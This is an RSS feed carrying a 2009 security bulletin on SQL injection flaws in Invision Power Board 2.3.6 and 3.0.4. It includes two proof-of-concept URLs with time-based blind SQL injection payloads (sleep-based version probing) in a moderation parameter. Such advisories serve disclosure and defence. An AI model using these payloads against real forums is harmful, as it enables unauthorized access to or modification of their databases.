<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; power board</title>
	<atom:link href="http://www.goitworld.com/tag/power-board/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Invision Power Board SQL Injection Vulnerabilities</title>
		<link>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/</link>
		<comments>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 03:32:13 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[invision]]></category>
		<category><![CDATA[power board]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>Version:</p>
<p>Invision Power Services Invision Power Board 2.3.6    <br />Invision Power Services Invision Power Board 3.0.4</p>
<p>Description:</p>
<p>The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.</p>
<p>Test</p>
<p><a href="http://www.example.com/?app=forums&#38;amp;module=moderate&#38;amp;section=moderate&#38;amp;f=1&#38;amp;do=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;s">http://www.example.com/?app=forums&#38;amp;module=moderate&#38;amp;section=moderate&#38;amp;f=1&#38;amp;do=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;s</a>    <br />tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20&#8211;%20skip%20&#38;amp;auth_key=c4276b77602767228faa9760eb4a5abd </p>
<p><a href="http://www.example.com/forum/?act=mod&#38;amp;f=1&#38;amp;CODE=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;starter=1%20AND%20starter_id=1%20OR">http://www.example.com/forum/?act=mod&#38;amp;f=1&#38;amp;CODE=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;starter=1%20AND%20starter_id=1%20OR</a>    <br />%20substr(version(),1,1)=5%20AND%20sleep(16)%20&#8211;%20skip%20&#38;amp;auth_key=040c4a6e768d626b4c05a4bb0fbf315c </p>
<p></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

